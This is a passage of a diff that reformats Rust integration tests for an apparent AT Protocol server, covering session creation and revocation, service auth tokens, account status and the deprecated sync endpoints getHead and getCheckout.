base)) 53 + .bearer_auth(&refresh_jwt) 54 + .send() 55 + .await 56 + .unwrap(); 57 assert_eq!(refresh.status(), StatusCode::OK); 58 let refresh_body: Value = refresh.json().await.unwrap(); 59 assert!(refresh_body["accessJwt"].as_str().is_some()); 60 assert_ne!(refresh_body["accessJwt"].as_str().unwrap(), access_jwt); 61 assert_ne!(refresh_body["refreshJwt"].as_str().unwrap(), refresh_jwt); 62 + let missing_id = client 63 + .post(format!("{}/xrpc/com.atproto.server.createSession", base)) 64 + .json(&json!({ "password": "password" })) 65 + .send() 66 + .await 67 + .unwrap(); 68 + assert!( 69 + missing_id.status() == StatusCode::BAD_REQUEST 70 + || missing_id.status() == StatusCode::UNPROCESSABLE_ENTITY 71 + ); 72 let invalid_handle = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base)) 73 .json(&json!({ "handle": "invalid!handle.com", "email": "test@example.com", "password": "password" })) 74 .send().await.unwrap(); 75 assert_eq!(invalid_handle.status(), StatusCode::BAD_REQUEST); 76 + let unauth_session = client 77 + .get(format!("{}/xrpc/com.atproto.server.getSession", base)) 78 + .bearer_auth(AUTH_TOKEN) 79 + .send() 80 + .await 81 + .unwrap(); 82 assert_eq!(unauth_session.status(), StatusCode::UNAUTHORIZED); 83 + let delete_session = client 84 + .post(format!("{}/xrpc/com.atproto.server.deleteSession", base)) 85 + .bearer_auth(AUTH_TOKEN) 86 + .send() 87 + .await 88 + .unwrap(); 89 assert_eq!(delete_session.status(), StatusCode::UNAUTHORIZED); 90 } 91 ··· 94 let client = client(); 95 let base = base_url().await; 96 let (access_jwt, did) = create_account_and_login(&client).await; 97 + let res = client 98 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 99 + .bearer_auth(&access_jwt) 100 + .query(&[("aud", "did:web:example.com")]) 101 + .send() 102 + .await 103 + .unwrap(); 104 assert_eq!(res.status(), StatusCode::OK); 105 let body: Value = res.json().await.unwrap(); 106 let token = body["token"].as_str().unwrap(); ··· 112 assert_eq!(claims["iss"], did); 113 assert_eq!(claims["sub"], did); 114 assert_eq!(claims["aud"], "did:web:example.com"); 115 + let lxm_res = client 116 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 117 + .bearer_auth(&access_jwt) 118 + .query(&[ 119 + ("aud", "did:web:example.com"), 120 + ("lxm", "com.atproto.repo.getRecord"), 121 + ]) 122 + .send() 123 + .await 124 + .unwrap(); 125 assert_eq!(lxm_res.status(), StatusCode::OK); 126 let lxm_body: Value = lxm_res.json().await.unwrap(); 127 let lxm_token = lxm_body["token"].as_str().unwrap(); ··· 129 let lxm_payload = URL_SAFE_NO_PAD.decode(lxm_parts[1]).unwrap(); 130 let lxm_claims: Value = serde_json::from_slice(&lxm_payload).unwrap(); 131 assert_eq!(lxm_claims["lxm"], "com.atproto.repo.getRecord"); 132 + let unauth = client 133 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 134 + .query(&[("aud", "did:web:example.com")]) 135 + .send() 136 + .await 137 + .unwrap(); 138 assert_eq!(unauth.status(), StatusCode::UNAUTHORIZED); 139 + let missing_aud = client 140 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 141 + .bearer_auth(&access_jwt) 142 + .send() 143 + .await 144 + .unwrap(); 145 assert_eq!(missing_aud.status(), StatusCode::BAD_REQUEST); 146 } 147 ··· 150 let client = client(); 151 let base = base_url().await; 152 let (access_jwt, _) = create_account_and_login(&client).await; 153 + let status = client 154 + .get(format!( 155 + "{}/xrpc/com.atproto.server.checkAccountStatus", 156 + base 157 + )) 158 + .bearer_auth(&access_jwt) 159 + .send() 160 + .await 161 + .unwrap(); 162 assert_eq!(status.status(), StatusCode::OK); 163 let body: Value = status.json().await.unwrap(); 164 assert_eq!(body["activated"], true); ··· 166 assert!(body["repoCommit"].is_string()); 167 assert!(body["repoRev"].is_string()); 168 assert!(body["indexedRecords"].is_number()); 169 + let unauth_status = client 170 + .get(format!( 171 + "{}/xrpc/com.atproto.server.checkAccountStatus", 172 + base 173 + )) 174 + .send() 175 + .await 176 + .unwrap(); 177 assert_eq!(unauth_status.status(), StatusCode::UNAUTHORIZED); 178 + let activate = client 179 + .post(format!("{}/xrpc/com.atproto.server.activateAccount", base)) 180 + .bearer_auth(&access_jwt) 181 + .send() 182 + .await 183 + .unwrap(); 184 assert_eq!(activate.status(), StatusCode::OK); 185 + let unauth_activate = client 186 + .post(format!("{}/xrpc/com.atproto.server.activateAccount", base)) 187 + .send() 188 + .await 189 + .unwrap(); 190 assert_eq!(unauth_activate.status(), StatusCode::UNAUTHORIZED); 191 + let deactivate = client 192 + .post(format!( 193 + "{}/xrpc/com.atproto.server.deactivateAccount", 194 + base 195 + )) 196 + .bearer_auth(&access_jwt) 197 + .json(&json!({})) 198 + .send() 199 + .await 200 + .unwrap(); 201 assert_eq!(deactivate.status(), StatusCode::OK); 202 }
+33 -9
tests/session_management.rs
··· 20 .expect("Failed to send request"); 21 assert_eq!(res.status(), StatusCode::OK); 22 let body: Value = res.json().await.unwrap(); 23 - let sessions = body["sessions"].as_array().expect("sessions should be array"); 24 assert!(!sessions.is_empty(), "Should have at least one session"); 25 - let current = sessions.iter().find(|s| s["isCurrent"].as_bool() == Some(true)); 26 assert!(current.is_some(), "Should have a current session marked"); 27 let session = current.unwrap(); 28 assert!(session["id"].as_str().is_some(), "Session should have id"); 29 - assert!(session["createdAt"].as_str().is_some(), "Session should have createdAt"); 30 - assert!(session["expiresAt"].as_str().is_some(), "Session should have expiresAt"); 31 let _ = did; 32 } 33 ··· 84 assert_eq!(list_res.status(), StatusCode::OK); 85 let list_body: Value = list_res.json().await.unwrap(); 86 let sessions = list_body["sessions"].as_array().unwrap(); 87 - assert!(sessions.len() >= 2, "Should have at least 2 sessions, got {}", sessions.len()); 88 let _ = jwt1; 89 } 90 ··· 154 .expect("Failed to list sessions"); 155 let list_body: Value = list_res.json().await.unwrap(); 156 let sessions = list_body["sessions"].as_array().unwrap(); 157 - let other_session = sessions.iter().find(|s| s["isCurrent"].as_bool() != Some(true)); 158 - assert!(other_session.is_some(), "Should have another session to revoke"); 159 let session_id = other_session.unwrap()["id"].as_str().unwrap(); 160 let revoke_res = client 161 .post(format!( ··· 179 .expect("Failed to list sessions after revoke"); 180 let list_after_body: Value = list_after_res.json().await.unwrap(); 181 let sessions_after = list_after_body["sessions"].as_array().unwrap(); 182 - let revoked_still_exists = sessions_after.iter().any(|s| s["id"].as_str() == Some(session_id)); 183 - assert!(!revoked_still_exists, "Revoked session should not appear in list"); 184 let _ = jwt1; 185 } 186
··· 20 .expect("Failed to send request"); 21 assert_eq!(res.status(), StatusCode::OK); 22 let body: Value = res.json().await.unwrap(); 23 + let sessions = body["sessions"] 24 + .as_array() 25 + .expect("sessions should be array"); 26 assert!(!sessions.is_empty(), "Should have at least one session"); 27 + let current = sessions 28 + .iter() 29 + .find(|s| s["isCurrent"].as_bool() == Some(true)); 30 assert!(current.is_some(), "Should have a current session marked"); 31 let session = current.unwrap(); 32 assert!(session["id"].as_str().is_some(), "Session should have id"); 33 + assert!( 34 + session["createdAt"].as_str().is_some(), 35 + "Session should have createdAt" 36 + ); 37 + assert!( 38 + session["expiresAt"].as_str().is_some(), 39 + "Session should have expiresAt" 40 + ); 41 let _ = did; 42 } 43 ··· 94 assert_eq!(list_res.status(), StatusCode::OK); 95 let list_body: Value = list_res.json().await.unwrap(); 96 let sessions = list_body["sessions"].as_array().unwrap(); 97 + assert!( 98 + sessions.len() >= 2, 99 + "Should have at least 2 sessions, got {}", 100 + sessions.len() 101 + ); 102 let _ = jwt1; 103 } 104 ··· 168 .expect("Failed to list sessions"); 169 let list_body: Value = list_res.json().await.unwrap(); 170 let sessions = list_body["sessions"].as_array().unwrap(); 171 + let other_session = sessions 172 + .iter() 173 + .find(|s| s["isCurrent"].as_bool() != Some(true)); 174 + assert!( 175 + other_session.is_some(), 176 + "Should have another session to revoke" 177 + ); 178 let session_id = other_session.unwrap()["id"].as_str().unwrap(); 179 let revoke_res = client 180 .post(format!( ··· 198 .expect("Failed to list sessions after revoke"); 199 let list_after_body: Value = list_after_res.json().await.unwrap(); 200 let sessions_after = list_after_body["sessions"].as_array().unwrap(); 201 + let revoked_still_exists = sessions_after 202 + .iter() 203 + .any(|s| s["id"].as_str() == Some(session_id)); 204 + assert!( 205 + !revoked_still_exists, 206 + "Revoked session should not appear in list" 207 + ); 208 let _ = jwt1; 209 } 210
+113 -31
tests/sync_deprecated.rs
··· 10 let client = client(); 11 let (did, jwt) = setup_new_user("gethead").await; 12 let res = client 13 - .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 14 .query(&[("did", did.as_str())]) 15 - .send().await.expect("Failed to send request"); 16 assert_eq!(res.status(), StatusCode::OK); 17 let body: Value = res.json().await.expect("Response was not valid JSON"); 18 assert!(body["root"].is_string()); 19 let root1 = body["root"].as_str().unwrap().to_string(); 20 assert!(root1.starts_with("bafy"), "Root CID should be a CID"); 21 let latest_res = client 22 - .get(format!("{}/xrpc/com.atproto.sync.getLatestCommit", base_url().await)) 23 .query(&[("did", did.as_str())]) 24 - .send().await.expect("Failed to get latest commit"); 25 let latest_body: Value = latest_res.json().await.unwrap(); 26 let latest_cid = latest_body["cid"].as_str().unwrap(); 27 - assert_eq!(root1, latest_cid, "getHead root should match getLatestCommit cid"); 28 create_post(&client, &did, &jwt, "Post to change head").await; 29 let res2 = client 30 - .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 31 .query(&[("did", did.as_str())]) 32 - .send().await.expect("Failed to get head after record"); 33 let body2: Value = res2.json().await.unwrap(); 34 let root2 = body2["root"].as_str().unwrap().to_string(); 35 assert_ne!(root1, root2, "Head CID should change after record creation"); 36 let not_found_res = client 37 - .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 38 .query(&[("did", "did:plc:nonexistent12345")]) 39 - .send().await.expect("Failed to send request"); 40 assert_eq!(not_found_res.status(), StatusCode::BAD_REQUEST); 41 let error_body: Value = not_found_res.json().await.unwrap(); 42 assert_eq!(error_body["error"], "HeadNotFound"); 43 let missing_res = client 44 - .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 45 - .send().await.expect("Failed to send request"); 46 assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST); 47 let empty_res = client 48 - .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 49 .query(&[("did", "")]) 50 - .send().await.expect("Failed to send request"); 51 assert_eq!(empty_res.status(), StatusCode::BAD_REQUEST); 52 let whitespace_res = client 53 - .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 54 .query(&[("did", " ")]) 55 - .send().await.expect("Failed to send request"); 56 assert_eq!(whitespace_res.status(), StatusCode::BAD_REQUEST); 57 } 58 ··· 61 let client = client(); 62 let (did, jwt) = setup_new_user("getcheckout").await; 63 let empty_res = client 64 - .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 65 .query(&[("did", did.as_str())]) 66 - .send().await.expect("Failed to send request"); 67 assert_eq!(empty_res.status(), StatusCode::OK); 68 let empty_body = empty_res.bytes().await.expect("Failed to get body"); 69 - assert!(!empty_body.is_empty(), "Even empty repo should return CAR header"); 70 create_post(&client, &did, &jwt, "Post for checkout test").await; 71 let res = client 72 - .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 73 .query(&[("did", did.as_str())]) 74 - .send().await.expect("Failed to send request"); 75 assert_eq!(res.status(), StatusCode::OK); 76 - assert_eq!(res.headers().get("content-type").and_then(|h| h.to_str().ok()), Some("application/vnd.ipld.car")); 77 let body = res.bytes().await.expect("Failed to get body"); 78 assert!(!body.is_empty(), "CAR file should not be empty"); 79 assert!(body.len() > 50, "CAR file should contain actual data"); 80 - assert!(body.len() >= 2, "CAR file should have at least header length"); 81 for i in 0..4 { 82 tokio::time::sleep(std::time::Duration::from_millis(50)).await; 83 create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await; 84 } 85 let multi_res = client 86 - .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 87 .query(&[("did", did.as_str())]) 88 - .send().await.expect("Failed to send request"); 89 assert_eq!(multi_res.status(), StatusCode::OK); 90 let multi_body = multi_res.bytes().await.expect("Failed to get body"); 91 - assert!(multi_body.len() > 500, "CAR file with 5 records should be larger"); 92 let not_found_res = client 93 - .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 94 .query(&[("did", "did:plc:nonexistent12345")]) 95 - .send().await.expect("Failed to send request"); 96 assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND); 97 let error_body: Value = not_found_res.json().await.unwrap(); 98 assert_eq!(error_body["error"], "RepoNotFound"); 99 let missing_res = client 100 - .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 101 - .send().await.expect("Failed to send request"); 102 assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST); 103 let empty_did_res = client 104 - .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 105 .query(&[("did", "")]) 106 - .send().await.expect("Failed to send request"); 107 assert_eq!(empty_did_res.status(), StatusCode::BAD_REQUEST); 108 }
··· 10 let client = client(); 11 let (did, jwt) = setup_new_user("gethead").await; 12 let res = client 13 + .get(format!( 14 + "{}/xrpc/com.atproto.sync.getHead", 15 + base_url().await 16 + )) 17 .query(&[("did", did.as_str())]) 18 + .send() 19 + .await 20 + .expect("Failed to send request"); 21 assert_eq!(res.status(), StatusCode::OK); 22 let body: Value = res.json().await.expect("Response was not valid JSON"); 23 assert!(body["root"].is_string()); 24 let root1 = body["root"].as_str().unwrap().to_string(); 25 assert!(root1.starts_with("bafy"), "Root CID should be a CID"); 26 let latest_res = client 27 + .get(format!( 28 + "{}/xrpc/com.atproto.sync.getLatestCommit", 29 + base_url().await 30 + )) 31 .query(&[("did", did.as_str())]) 32 + .send() 33 + .await 34 + .expect("Failed to get latest commit"); 35 let latest_body: Value = latest_res.json().await.unwrap(); 36 let latest_cid = latest_body["cid"].as_str().unwrap(); 37 + assert_eq!( 38 + root1, latest_cid, 39 + "getHead root should match getLatestCommit cid" 40 + ); 41 create_post(&client, &did, &jwt, "Post to change head").await; 42 let res2 = client 43 + .get(format!( 44 + "{}/xrpc/com.atproto.sync.getHead", 45 + base_url().await 46 + )) 47 .query(&[("did", did.as_str())]) 48 + .send() 49 + .await 50 + .expect("Failed to get head after record"); 51 let body2: Value = res2.json().await.unwrap(); 52 let root2 = body2["root"].as_str().unwrap().to_string(); 53 assert_ne!(root1, root2, "Head CID should change after record creation"); 54 let not_found_res = client 55 + .get(format!( 56 + "{}/xrpc/com.atproto.sync.getHead", 57 + base_url().await 58 + )) 59 .query(&[("did", "did:plc:nonexistent12345")]) 60 + .send() 61 + .await 62 + .expect("Failed to send request"); 63 assert_eq!(not_found_res.status(), StatusCode::BAD_REQUEST); 64 let error_body: Value = not_found_res.json().await.unwrap(); 65 assert_eq!(error_body["error"], "HeadNotFound"); 66 let missing_res = client 67 + .get(format!( 68 + "{}/xrpc/com.atproto.sync.getHead", 69 + base_url().await 70 + )) 71 + .send() 72 + .await 73 + .expect("Failed to send request"); 74 assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST); 75 let empty_res = client 76 + .get(format!( 77 + "{}/xrpc/com.atproto.sync.getHead", 78 + base_url().await 79 + )) 80 .query(&[("did", "")]) 81 + .send() 82 + .await 83 + .expect("Failed to send request"); 84 assert_eq!(empty_res.status(), StatusCode::BAD_REQUEST); 85 let whitespace_res = client 86 + .get(format!( 87 + "{}/xrpc/com.atproto.sync.getHead", 88 + base_url().await 89 + )) 90 .query(&[("did", " ")]) 91 + .send() 92 + .await 93 + .expect("Failed to send request"); 94 assert_eq!(whitespace_res.status(), StatusCode::BAD_REQUEST); 95 } 96 ··· 99 let client = client(); 100 let (did, jwt) = setup_new_user("getcheckout").await; 101 let empty_res = client 102 + .get(format!( 103 + "{}/xrpc/com.atproto.sync.getCheckout", 104 + base_url().await 105 + )) 106 .query(&[("did", did.as_str())]) 107 + .send() 108 + .await 109 + .expect("Failed to send request"); 110 assert_eq!(empty_res.status(), StatusCode::OK); 111 let empty_body = empty_res.bytes().await.expect("Failed to get body"); 112 + assert!( 113 + !empty_body.is_empty(), 114 + "Even empty repo should return CAR header" 115 + ); 116 create_post(&client, &did, &jwt, "Post for checkout test").await; 117 let res = client 118 + .get(format!( 119 + "{}/xrpc/com.atproto.sync.getCheckout", 120 + base_url().await 121 + )) 122 .query(&[("did", did.as_str())]) 123 + .send() 124 + .await 125 + .expect("Failed to send request"); 126 assert_eq!(res.status(), StatusCode::OK); 127 + assert_eq!( 128 + res.headers() 129 + .get("content-type") 130 + .and_then(|h| h.to_str().ok()), 131 + Some("application/vnd.ipld.car") 132 + ); 133 let body = res.bytes().await.expect("Failed to get body"); 134 assert!(!body.is_empty(), "CAR file should not be empty"); 135 assert!(body.len() > 50, "CAR file should contain actual data"); 136 + assert!( 137 + body.len() >= 2, 138 + "CAR file should have at least header length" 139 + ); 140 for i in 0..4 { 141 tokio::time::sleep(std::time::Duration::from_millis(50)).await; 142 create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await; 143 } 144 let multi_res = client 145 + .get(format!( 146 + "{}/xrpc/com.atproto.sync.getCheckout", 147 + base_url().await 148 + )) 149 .query(&[("did", did.as_str())]) 150 + .send() 151 + .await 152 + .expect("Failed to send request"); 153 assert_eq!(multi_res.status(), StatusCode::OK); 154 let multi_body = multi_res.bytes().await.expect("Failed to get body"); 155 + assert!( 156 + multi_body.len() > 500, 157 + "CAR file with 5 records should be larger" 158 + ); 159 let not_found_res = client 160 + .get(format!( 161 + "{}/xrpc/com.atproto.sync.getCheckout", 162 + base_url().await 163 + )) 164 .query(&[("did", "did:plc:nonexistent12345")]) 165 + .send() 166 + .await 167 + .expect("Failed to send request"); 168 assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND); 169 let error_body: Value = not_found_res.json().await.unwrap(); 170 assert_eq!(error_body["error"], "RepoNotFound"); 171 let missing_res = client 172 + .get(format!( 173 + "{}/xrpc/com.atproto.sync.getCheckout", 174 + base_url().await 175 + )) 176 + .send() 177 + .await 178 + .expect("Failed to send request"); 179 assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST); 180 let empty_did_res = client 181 + .get(format!( 182 + "{}/xrpc/com.atproto.sync.getCheckout", 183 + base_url().await 184 + )) 185 .query(&[("did", "")]) 186 + .send() 187 + .await 188 + .expect("Failed to send request"); 189 assert_eq!(empty_did_res.status(), StatusCode::BAD_REQUEST); 190 }
+2 -2
tests/verify_live_commit.rs
··· 1 use bytes::Bytes; 2 use cid::Cid; 3 use std::collections::HashMap; 4 - use std::str::FromStr; 5 mod common; 6 7 #[tokio::test] ··· 108 cursor.read_exact(&mut header_bytes)?; 109 #[derive(serde::Deserialize)] 110 struct CarHeader { 111 version: u64, 112 roots: Vec<cid::Cid>, 113 } ··· 135 fn parse_cid(bytes: &[u8]) -> Result<(Cid, usize), Box<dyn std::error::Error>> { 136 if bytes[0] == 0x01 { 137 let codec = bytes[1]; 138 - let hash_type = bytes[2]; 139 let hash_len = bytes[3] as usize; 140 let cid_len = 4 + hash_len; 141 let cid = Cid::new_v1(
··· 1 use bytes::Bytes; 2 use cid::Cid; 3 use std::collections::HashMap; 4 mod common; 5 6 #[tokio::test] ··· 107 cursor.read_exact(&mut header_bytes)?; 108 #[derive(serde::Deserialize)] 109 struct CarHeader { 110 + #[allow(dead_code)] 111 version: u64, 112 roots: Vec<cid::Cid>, 113 } ··· 135 fn parse_cid(bytes: &[u8]) -> Result<(Cid, usize), Box<dyn std::error::Error>> { 136 if bytes[0] == 0x01 { 137 let codec = bytes[1]; 138 + let _hash_type = bytes[2]; 139 let hash_len = bytes[3] as usize; 140 let cid_len = 4 + hash_len; 141 let cid = Cid::new_v1(